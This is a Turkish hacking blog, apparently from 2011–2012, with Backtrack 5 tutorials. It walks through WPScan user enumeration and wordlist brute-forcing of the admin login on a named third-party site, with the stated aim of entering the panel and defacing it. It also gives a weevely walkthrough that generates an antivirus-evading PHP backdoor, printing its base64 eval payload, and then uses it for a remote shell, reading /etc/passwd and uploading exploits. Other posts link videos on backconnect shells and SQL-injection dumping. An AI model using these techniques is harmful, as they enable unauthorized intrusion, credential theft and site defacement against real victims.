backtrack 5 etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster
backtrack 5 etiketine sahip kayıtlar gösteriliyor. Tüm kayıtları göster

5 Nisan 2012 Perşembe

Backtrack 5 ~ Email Collector

Backtrack 5 ~ Email Collector kullanımı hakkında bir videodur.

Kendi anlatımımdır.

Umarım faydalı olur


http://www.youtube.com/watch?v=1K8bE_5vNHE&feature=youtu.be

selametle..

16 Mart 2012 Cuma

4 Mart 2012 Pazar

BackTrack 5 Backconnect Olma ~# Th4 MasK

Bazı Aksaklıklar Olsada Çektim (:

Thanks : DeaDSLayeR


İyi Seyirler..


http://www.youtube.com/watch?v=Ug_qBNxPoUY&feature=player_embedded

31 Ocak 2012 Salı

Backtrack 5 WPScan Kullanımı // Th4 MasK



Backtrack 5  WPScan Kullanımı.


Merhabalar. Ben Th4 MasK ,


Sizlere Kendi Anlatımım Olan WpScan Kullanımı Anlatıcam.


Şimdi Bununla Ne yapabiliriz Diyenler İçin Hemen Söyliyim ;


Bununla Brute Force Yaparak Sitelerin Açıgının BUlunması,Username Ve Password Bulunmasından Yardımcı olur.


Bir Nevi Siteyi Hacklemenin yarısından fazlasını geçmiş olursun Geriye kalan panele girip index atmaktir (:


Çok Konuştum Hemen Başlıyayım (:


İlk önce Terminal Açıyoruz.


cd /pentest/web/wpscan/ dileyim ve wpscan'mız karşımıza gelsin.


ruby wpscan.rb --h ile karşımıza nasıl kullanıcağımıza dair rapor Alabiliriz


ruby wescan.rb --url Victim ;


ruby wpscan.rb --url neovision.co.za  Bunu yaparsak Sitenin Hangi açıkla hackliyebiliceğimizi Bulabiliriz.


Ben size Şimdi Wpcan İle username Ve Password Bulmayı Göstericem..


Şunu Söylemek İsterimki Tabiki Bunu Atanılan wordlist'e bağlıdır ve Onunla İş yapılır. Wordlist ne kadar 
saglam olursa o kadar daha basitleştirir..


İlk Önce Sizlere Username Nasıl Ulaşıcagınızı Göstericem.


ruby wpscan.rb --url Victim --enumerate u ;


" ruby wpscan.rb --url neovision.co.za --enumerate u " bu kod ile username bulabilirsiniz. (Tırnak İşaretlirini Koymayınız )


Dedikten sonra Eğer Bulursa ; 


We found the following 1 username/s:


admin


Bu şekilde Görüceksiniz..


Sıra Geldi Pass Bulmaya ;


ruby wpscan.rb --url Victim --username Kullanıcıadı --wordlist Wordlist Yolu  ;


ruby wpscan.rb --url neovision.co.za --username admin --wordlist /pentest/passwords/wordlists/darkc0de.lst


Yukarıda Ben Wordlist Yerini /pentest/passwords/wordlists Bulunan darkc0de Listesini belirledim ve oradaki passları denicek


Tabiki Orada Siz Kendi Wordlist'nizide atıp Deniyebiliriz.


Hemen Bir Örnek Gösteriyim ;


tmp dizinine bir pass.txt veya wordlist.txt diye bir dosya açalım ve buraya bir kaç şifre ile dolduralım.


Şimdi Wordlistimizi Bu sitede Denicez şu şekilde ;


ruby wpscan.rb --url neovision.co.za --username admin --wordlist /tmp/pass.txt şeklinde..


Sonuçta Şu Şekilde Olucaktır. 


SUCCESS! Username : admin Şifre : 12345 Gibi..


Anlatıcaklarım Bu Kadardır Umarım Faydalı Olmuşumdur.


Th4 MasK ~ th4mask.blogspot.com
Bilinmezlik Diyarından









25 Ocak 2012 Çarşamba

Genele Açık DNS Sunucuların Bulunması

Herkese açık DNS sunucular(public dns) kendisine gelen tüm istekleri cevaplamaya çalışan türde bir dns sunucu tipidir. Bu tip dns sunucular eğer gerçekten amacı genele hizmet vermek değilse genellikle eksik/yanlış yapılandırmanın sonucu ortaya çıkar.
Bir sunucunun genele açık hizmet(recursive DNS çözücü) verip vermediğini anlamanın en kolay yolu o DNS sunucusu üzerinden google.com, yahoo.com gibi o DNS sunucuda tutulmayan alan adlarını sorgulamaktır.
Eğer hedef DNS sunucu genele açık bir DNS sunucu olarak yapılandırıldıysa aşağıdakine benzer çıktı verecektir.
~# dig www.google.com @91.93.119.70
; <<>> DiG 9.5.0-P2.1 <<>> www.google.com @91.93.119.70
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 26294
;; flags: qr rd ra; QUERY: 1, ANSWER: 7, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;www.google.com. IN A
;; ANSWER SECTION:
www.google.com. 44481 IN CNAME www.l.google.com.
www.l.google.com. 118 IN A 66.102.13.147
www.l.google.com. 118 IN A 66.102.13.99
www.l.google.com. 118 IN A 66.102.13.105
www.l.google.com. 118 IN A 66.102.13.103
www.l.google.com. 118 IN A 66.102.13.104
www.l.google.com. 118 IN A 66.102.13.106

;; Query time: 16 msec
;; SERVER: 91.93.119.70#53(91.93.119.70)
;; WHEN: Sat Jul 24 13:23:59 2010
;; MSG SIZE rcvd: 148
Eğer DNS sunucu genele açık hizmet verecek şekilde yapılandırılmadıysa aşağıdakine benzer çıktı verecektir.
[root@seclabs ~]# dig @ns1.gezginler.net www.google.com
; <<>> DiG 9.6.1-P1 <<>> @ns1.gezginler.net www.google.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 33451
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 13, ADDITIONAL: 0
;; WARNING: recursion requested but not available
;; QUESTION SECTION:
;www.google.com. IN A
;; AUTHORITY SECTION:
. 518400 IN NS H.ROOT-SERVERS.NET.
. 518400 IN NS I.ROOT-SERVERS.NET.
. 518400 IN NS J.ROOT-SERVERS.NET.
. 518400 IN NS K.ROOT-SERVERS.NET.
. 518400 IN NS L.ROOT-SERVERS.NET.
. 518400 IN NS M.ROOT-SERVERS.NET.
. 518400 IN NS A.ROOT-SERVERS.NET.
. 518400 IN NS B.ROOT-SERVERS.NET.
. 518400 IN NS C.ROOT-SERVERS.NET.
. 518400 IN NS D.ROOT-SERVERS.NET.
. 518400 IN NS E.ROOT-SERVERS.NET.
. 518400 IN NS F.ROOT-SERVERS.NET.
. 518400 IN NS G.ROOT-SERVERS.NET.
;; Query time: 140 msec
;; SERVER: 208.43.98.30#53(208.43.98.30)
;; WHEN: Sat Aug 7 16:18:15 2010
;; MSG SIZE rcvd: 243
Bir IP aralığındaki tüm public DNS sunucuları bulmak için Nmap (Nmap Scripting Engine) kullanılabilir.
root@seclabs:~# nmap -PN -n -sU -p 53 –script=dns-recursion.nse 91.93.119.65/28
Starting Nmap 5.00 ( http://nmap.org ) at 2010-07-24 13:19 EDT
Interesting ports on 91.93.119.64:
PORT STATE SERVICE
53/udp open|filtered domain
Interesting ports on 91.93.119.65:
PORT STATE SERVICE
53/udp open|filtered domain
Interesting ports on 91.93.119.66:
PORT STATE SERVICE
53/udp open|filtered domain
Interesting ports on 91.93.119.67:
PORT STATE SERVICE
53/udp open|filtered domain
|_ dns-recursion: Recursion appears to be enabled
Interesting ports on 91.93.119.68:
PORT STATE SERVICE
53/udp open|filtered domain
Interesting ports on 91.93.119.69:
PORT STATE SERVICE
53/udp open|filtered domain
|_ dns-recursion: Recursion appears to be enabled
Interesting ports on 91.93.119.70:
PORT STATE SERVICE
53/udp open|filtered domain
|_ dns-recursion: Recursion appears to be enabled
Interesting ports on 91.93.119.71:
PORT STATE SERVICE
53/udp open|filtered domain
|_ dns-recursion: Recursion appears to be enabled
Interesting ports on 91.93.119.72:
PORT STATE SERVICE
53/udp open|filtered domain
|_ dns-recursion: Recursion appears to be enabled
Interesting ports on 91.93.119.73:
PORT STATE SERVICE
53/udp open|filtered domain
|_ dns-recursion: Recursion appears to be enabled
Interesting ports on 91.93.119.74:
PORT STATE SERVICE
53/udp open|filtered domain
|_ dns-recursion: Recursion appears to be enabled
Interesting ports on 91.93.119.75:
PORT STATE SERVICE
53/udp open|filtered domain
|_ dns-recursion: Recursion appears to be enabled
Interesting ports on 91.93.119.76:
PORT STATE SERVICE
53/udp open|filtered domain
|_ dns-recursion: Recursion appears to be enabled
Interesting ports on 91.93.119.77:
PORT STATE SERVICE
53/udp open|filtered domain
Interesting ports on 91.93.119.78:
PORT STATE SERVICE
53/udp open|filtered domain
|_ dns-recursion: Recursion appears to be enabled
Interesting ports on 91.93.119.79:
PORT STATE SERVICE
53/udp open|filtered domain
Nmap done: 16 IP addresses (16 hosts up) scanned in 34.65 seconds
Public DNS sunucular neden güvenlik açısından risklidir?
Public dns sunucuların özellikle DNS flood saldırılarına karşı sıkıntılıdırlar. Saldırgan public dns sunucuları kullanarak amplification dns flood saldırılarında size ait dns sunuculardan ciddi oranlarda trafik oluşturarak istediği bir sistemi zor durumda bırakabilir.
DNS sunucu olarak ISC BIND kullanıyorsanız aşağıdaki tanımla recursive dns sorgularına yanıt vermeyi engelleyebilirsiniz.
options { allow-recursion { 127.0.0.1; };

Web Attack Post Exploitation


Uzak web sunuculara güvenlik açığından faydalanarak sızıldığında erişimin devam ettirilmesi için web tabanlı bir ajana ihtiyaç duyulur. Farklı dillerde (php, asp, java, .net, cgi vb.) yazılmış çeşitli yazılımlar mevcut. En popüler ve bilinen yazılımlar arasında, c99, r57, Aspxspy vb. scriptler bulunuyor. Hemen hemen hepsinin sorun yaşatan ortak yanı, Antivirus ve IPS ler tarafından tanınması ve çeşitli güvenlik ilkelerini (php disable_function gibi) bypass edememesi.
Daha önce buradaki yazımızda, meterpreter ile farklı web platformları için payload oluşturmakdan ve antivirusler tarafından tananınmamasını sağlamak üzere encoding tekniklerinden bahsetmiştik.
http://blog.bga.com.tr/beyaz-sapkali-hackerceh/asp-encode-ile-reverse-shell-msfencode
http://blog.bga.com.tr/beyaz-sapkali-hackerceh/php-reverse-shell-meterpreter
Bu yazıda, pratik olarak weevely php backdoor ile benzeri uygulamalar yer almaktadır.
weevely telnet benzeri bağlantı türünü destekleyen ve göze çarpmayan bir php backdoor ugulamasıdır. Web saldırılarında, erişimi sürdürmek ve sistemde ilerlemek için çeşitli post explotion tekniklerini içerir. Antivirusler tarafından tanınmamaktadır. Veri transferini HTTP Refferer değerleri üzerinden şifreli ilettiği için NIDS, IPS, WAF benzeri sistemler tanıyamamaktadır.
Desteklediği Moduller;
  • :shell.sh Sistem komutlarını sh kabuğunda çalıştırır.
  • :shell.php PHP komutlarını uzak sistemde çalıştırır.
  • :file.upload Hedefin dosya sistemine dosya upload eder.
  • :file.download Hedefin dosya sisteminden dosya download eder.
  • :find.* Dosya adı, yetkiler, suid/sgid bayrakları bulur.
  • :backdoor.reverse_tcp Reverse TCP shell açar.
  • :enum.users Hedef sistemdeki kullanıcıları veya /etc/passwd içeriğini getirir.
  • :enum.user_files home ve public_html dizinlerindeki dosyaları listeler
  • :system.info Hedef  Hedef sistem hakkında bilgi toplar
Kurulumu
http://code.google.com/p/weevely/ adresinden indirebilisiniz.
# tar zxvf weevely-0.4.tar.gz
# cd weevely
Genel kullanımı hakkında bilgi almak için
# python weevely.py
Weevely 0.4 – Generate and manage stealth PHP backdoors
Emilio Pinna, Simone Margaritelli 2011-2012
Start telnet-like session
weevely
Run single command or module
weevely
weevely : ..
Generate PHP backdoor script
weevely generate
Show help with command :help and run modules with :. Available modules:
[shell] :shell.sh, :shell.php
[enum] :enum.user_files, :enum.binaries, :enum.paths, :enum.users
[system] :system.info
[backdoor] :backdoor.reverse_tcp
[file] :file.upload, :file.check, :file.download, :file.read
[find] :find.webdir, :find.suidsgid, :find.name, :find.perms
Örnek bir php backdoor oluşturması
# python weevely.py generate P@ssw0rd ajan.php
Weevely 0.4 – Generate and manage stealth PHP backdoors
Emilio Pinna, Simone Margaritelli 2011-2012
+ Backdoor file ‘ajan.php’ created with password ‘P@ssw0rd’.
Oluşturulan dosyanın içeriği size özeldir ve benzersizdir.
# more ajan.php
<?php eval(base64_decode(‘aW5pX3NldCgnZXJyb3JfbG9nJywgJy9kZXYvbnVsbCcpO3BhcnNlX3N0cigkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10sJGEpO2lmKHJlc2V0KCRhKT09J1BAJyAmJiBjb3VudCgkYSk9P
TkpIHtlY2hvICc8c3N3MHJkPic7ZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCIgIiwgIisiLCBqb2luKGFycmF5X3NsaWNlKCRhLGNvdW50KCRhKS0zKSkpKSk7ZWNobyAnPC9zc3cwcmQ+Jzt9′)); ?>
www.virustotal.com tarama sonucu;
42 antivirus’den hiç biri tanımıyor.
Dosya hedef web sunucuya yüklendikden sonra, komut satırından iletişim kurulabilir.
Örnek Uygulamalar
Uzak sunucuda, bulunduğun dizindeki dosyaları listele
# python weevely.py http://6.6.6.64/ajan.php P@ssw0rd :shell.sh dir
Weevely 0.4 – Generate and manage stealth PHP backdoors
Emilio Pinna, Simone Margaritelli 2011-2012
[shell.sh] Shell interpreter loaded using method ‘system’
[shell.sh] Loaded system shell
COPYING fakeap.tar.gz nmap.sh
acunetix.exe fakeap3.tar.gz nmap.txt
Telnet benzeri bağlantı kurarak, komut satırından çalışma hızlı çalışma yapılabilir
# python weevely.py http://6.6.6.64/ajan.php P@ssw0rd
Weevely 0.4 – Generate and manage stealth PHP backdoors
Emilio Pinna, Simone Margaritelli 2011-2012
[+] Starting terminal. Shell probe may take a while…
[shell.sh] Shell interpreter loaded using method ‘system’
[shell.sh] Loaded system shell
[shell.sh] Show help with :help command
[shell.sh] Run modules with : …
www-data@localhost:/var/www$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync

Hedefe casus yazılım, exploit vb. dosya upload etmek
# python weevely.py http://6.6.6.64/ajan.php P@ssw0rd :file.upload /tmp/exploit /tmp/exploit
Weevely 0.4 – Generate and manage stealth PHP backdoors
Emilio Pinna, Simone Margaritelli 2011-2012
[shell.sh] Shell interpreter loaded using method ‘system’
[shell.sh] Loaded system shell
[!] [file.upload] File ‘/tmp/exploit’ uploaded.
Sistem hakkında bilgi toplamak
# python weevely.py http://6.6.6.64/ajan.php P@ssw0rd :system.info auto
Weevely 0.4 – Generate and manage stealth PHP backdoors
Emilio Pinna, Simone Margaritelli 2011-2012
[shell.sh] Shell interpreter loaded using method ‘system’
[shell.sh] Loaded system shell
client_ip: 6.6.6.112
hostname: lab.cehturkiye.com
script: /ajan.php
basedir: /var/www
uname: Linux localhost 2.6.38-11-generic #50-Ubuntu SMP Mon Sep 12 21:17:25 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
safe_mode: 0
os: Linux
whoami: www-data
document_root: /var/www
Weevely ile iletişim izlendiğinde, ajan’a komutların HTTP Refferer istekleri ile taşındığını görebilirsiniz. Bu çalışma mantığı ile NIDS vb. sistemler tarafından tanınmamaktadır.

19 Aralık 2011 Pazartesi

DarkMySQLi Kullanımı



Merhaba Arkadaşlar Size DarkMySQLi Kullanımını Gösterdim.

Anlatımlara Devam Ediyorum.

Pyhton Diliyle Yazılmış Bir Exploittir.

SQLMAP'dan Bence Daha iyidir

Ne işe yarar Derseniz SQL Acıklı Sitede tabloları,kolonları username ve password bulur.

İyi seyirler.